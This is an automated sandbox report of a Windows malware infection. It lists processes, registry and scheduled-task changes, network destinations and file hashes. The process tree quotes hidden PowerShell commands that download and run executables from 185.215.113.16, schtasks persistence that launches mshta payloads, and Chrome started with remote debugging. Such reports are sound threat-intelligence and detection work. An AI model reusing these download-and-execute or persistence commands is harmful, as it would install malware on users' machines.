| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe
"C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 68
C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"
C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe
"C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn jIzd4maWSGR /tr "mshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn jIzd4maWSGR /tr "mshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE
"C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6849758,0x7fef6849768,0x7fef6849778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "6fLQXma4qrZ" /tr "mshta \"C:\Temp\My6dz0IVO.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1100 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1380 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1464 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1868 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2088 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\My6dz0IVO.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2452 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1300 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3516 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3636 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe
"C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3624 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe
"C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"
C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe
"C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {ED4AE890-6A52-4F3B-8F30-ACF88E571A55} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
C:\ProgramData\omlnpw\uxek.exe
C:\ProgramData\omlnpw\uxek.exe
C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe
"C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\ym7yu" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe
"C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe"
C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe
"C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe
"C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe"
C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe
"C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 68
C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe
"C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"
C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe
"C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"
C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe
"C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| RU | 185.215.113.75:80 | 185.215.113.75 | tcp |
| US | 8.8.8.8:53 | advertised.life | udp |
| US | 104.21.94.161:443 | advertised.life | tcp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| GB | 216.58.213.10:443 | ogads-pa.googleapis.com | tcp |
| GB | 216.58.213.10:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.178.14:443 | play.google.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 142.250.178.14:443 | play.google.com | udp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| NL | 185.198.234.185:80 | cobolrationumelawrtewarms.com | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| DE | 104.194.157.122:80 | 104.194.157.122 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| US | 8.8.8.8:53 | pirtyoffensiz.bet | udp |
| US | 172.67.198.28:443 | pirtyoffensiz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | investiigato.website | udp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| DE | 93.186.202.3:4000 | towerbingobongoboom.com | tcp |
| US | 104.21.94.161:443 | advertised.life | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 172.67.198.28:443 | pirtyoffensiz.bet | tcp |
| US | 8.8.8.8:53 | breakfasutwy.cyou | udp |
| US | 8.8.8.8:53 | importenptoc.com | udp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | voicesharped.com | udp |
| US | 8.8.8.8:53 | inputrreparnt.com | udp |
| US | 8.8.8.8:53 | torpdidebar.com | udp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.16.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | rebeldettern.com | udp |
| US | 8.8.8.8:53 | actiothreaz.com | udp |
| US | 8.8.8.8:53 | garulouscuto.com | udp |
| US | 8.8.8.8:53 | breedertremnd.com | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | outlinedtrai.bet | udp |
| US | 172.67.218.33:443 | outlinedtrai.bet | tcp |
Files
memory/2348-0-0x0000000000220000-0x00000000006F0000-memory.dmp
memory/2348-1-0x0000000077BA0000-0x0000000077BA2000-memory.dmp
memory/2348-2-0x0000000000221000-0x0000000000289000-memory.dmp
memory/2348-3-0x0000000000220000-0x00000000006F0000-memory.dmp
memory/2348-4-0x0000000000220000-0x00000000006F0000-memory.dmp
\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
| MD5 | a3ec4b44e7677c12a76bf51f45480133 |
| SHA1 | 15587b7a0420115e979461490689a79beca64118 |
| SHA256 | 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2 |
| SHA512 | 4d1dfb16076f0fd17c2d6a0bfe221af69dda9bf7e75f82a13f64e5bd732ff56e7f42b36864b0e07c3ae78bcb459124e700640e03ba0a416121ae7146ea4bf075 |
memory/2680-20-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2348-18-0x0000000006FF0000-0x00000000074C0000-memory.dmp
memory/2348-21-0x0000000000221000-0x0000000000289000-memory.dmp
memory/2348-17-0x0000000000220000-0x00000000006F0000-memory.dmp
memory/2680-22-0x0000000000FE1000-0x0000000001049000-memory.dmp
memory/2680-23-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2680-25-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2680-26-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2680-27-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2680-29-0x0000000000FE1000-0x0000000001049000-memory.dmp
memory/2680-28-0x0000000000FE0000-0x00000000014B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
| MD5 | 515748a93ce7beb3f4416ec66ba8488e |
| SHA1 | 3ba2f1a56dcc91967361622c56b1ba545cda4325 |
| SHA256 | a09d49280077ed84d72c5b39977a67155f7bf1bc12615fecb6ec81a0aa2f92a6 |
| SHA512 | 3ce752a103a11b4ef84e6531f4feebcd70f5dfde979e3952709a686fb03e67741d894037406fc23fc5ea3b506d650653a01f3ef48fd7b5a44f79e45c8eb96ffb |
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
| MD5 | 896dc9ae02a4b0cf429b4346a3990fae |
| SHA1 | 17f297bb4cf3acd07078fc5d73c1d6564a8c0710 |
| SHA256 | 6498189cc01fc00d92663abc7f60c27326ba5f059f1b2c4f499ed2856722d8a2 |
| SHA512 | e642b273a2cc01a32cede4d3400a910825d89d117333e0a96488721636783b9065f081ace394af0c484be4e60ab5249b390e840aeaa4115920e976fbd632851c |
memory/1452-59-0x0000000000EE0000-0x0000000000F90000-memory.dmp
memory/1748-75-0x0000000000400000-0x000000000045F000-memory.dmp
memory/1748-73-0x0000000000400000-0x000000000045F000-memory.dmp
memory/1748-72-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/1748-70-0x0000000000400000-0x000000000045F000-memory.dmp
memory/1748-68-0x0000000000400000-0x000000000045F000-memory.dmp
memory/1748-66-0x0000000000400000-0x000000000045F000-memory.dmp
memory/1748-64-0x0000000000400000-0x000000000045F000-memory.dmp
memory/1748-62-0x0000000000400000-0x000000000045F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
| MD5 | 87da0483aefde76a5086c5b2ea14304f |
| SHA1 | ae6b27aeaf487666c71b26397709004e65b09002 |
| SHA256 | 33f44b2fa9a46ef2ce1d03303d8f959e070ba8a1109ad302b5461ad74ef99c4f |
| SHA512 | ca28949636f5d32e161b81d993a22839d65aea050ba7f8452ca70b6a2c8fd7385adbb9f2e5ad7da8edd3956b9d222452d5b86684ff0c7f3e2dc86930820f65e4 |
memory/2680-90-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2876-94-0x0000000000400000-0x000000000086A000-memory.dmp
memory/2680-93-0x0000000006710000-0x0000000006B7A000-memory.dmp
memory/1472-102-0x000000013F730000-0x000000013FBEB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabCB0.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarD20.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0dadbeb6cb656c1adadb2015c5727321 |
| SHA1 | 7bdb83d1c1dbbe875804d6ec90d87fc205638c16 |
| SHA256 | 323066e5228b20f9be99a08a9d14695423f8b12198ef49ff4bd537988e98c9ce |
| SHA512 | 067cf6d24c40d0775e11c3fc0d9e8819d6dc63f92362fbbd82ec4dc25f38b92f2891da5c3811931821ae4937f4df290f16e4f1b3dd37145b75e6d2e9d4dfac41 |
C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe
| MD5 | 5b0bf9144e2661027c1621957b1ef278 |
| SHA1 | 589efc0736ecc18d94e4dd8d353502e8d76738c4 |
| SHA256 | a4337bb42c32b5dd68fef60740164ec01ee3f94ecc8345f4d396eea82f96b21f |
| SHA512 | e0b10ecfbd4e241a78653a05ed1b65f89fe4c25109fd1276d0091d834ee9e90d3f4c253b506ab508cfd81ba65214a0917d6fe902873ccc1f179fae57b6db2177 |
C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta
| MD5 | ae563590dd5b65fb84045428b3c11628 |
| SHA1 | 5690c743b714148b4017ea721dad61b654976dce |
| SHA256 | 0ef0e06906218a3cbe624c964e5fd67bf277e3d3ee6cf291af5db22ceada9d88 |
| SHA512 | 2186ad4b4bbc1f9180139d38f9d89369561e7bc867359d424a0984ac7683ce86ab30d5dfd2697f6249988b102358e769f41e275bb8b1917d845a4e5b7294827a |
C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd
| MD5 | 189e4eefd73896e80f64b8ef8f73fef0 |
| SHA1 | efab18a8e2a33593049775958b05b95b0bb7d8e4 |
| SHA256 | 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396 |
| SHA512 | be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74 |
\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE
| MD5 | 03a574d64f0e62c5e117a5f5acf137e4 |
| SHA1 | 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90 |
| SHA256 | dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747 |
| SHA512 | d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1 |
memory/1452-277-0x0000000001270000-0x00000000016C2000-memory.dmp
memory/2680-276-0x0000000006710000-0x0000000006B7A000-memory.dmp
memory/2876-274-0x0000000000400000-0x000000000086A000-memory.dmp
memory/1672-273-0x0000000006440000-0x0000000006892000-memory.dmp
memory/1672-272-0x0000000006440000-0x0000000006892000-memory.dmp
memory/1452-296-0x0000000001270000-0x00000000016C2000-memory.dmp
memory/1452-297-0x0000000001270000-0x00000000016C2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 9b007a287efa6b3a81140630ab982f57 |
| SHA1 | 5d25771df48e4f684da495be34f9f4397cc1b262 |
| SHA256 | 6003b304cea7770b10db506f07194eacfa3a0a794df79bc42af91cacca68c02c |
| SHA512 | 3e97c17b2661d1b9476bb0b195e6773c68f13564e952f6758cbf8078160fdf31b0d8ea04f8465ad4c8475819e6f50a054178d07ce2d18482c8422a232511ded8 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
C:\Temp\My6dz0IVO.hta
| MD5 | 16d76e35baeb05bc069a12dce9da83f9 |
| SHA1 | f419fd74265369666595c7ce7823ef75b40b2768 |
| SHA256 | 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7 |
| SHA512 | 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
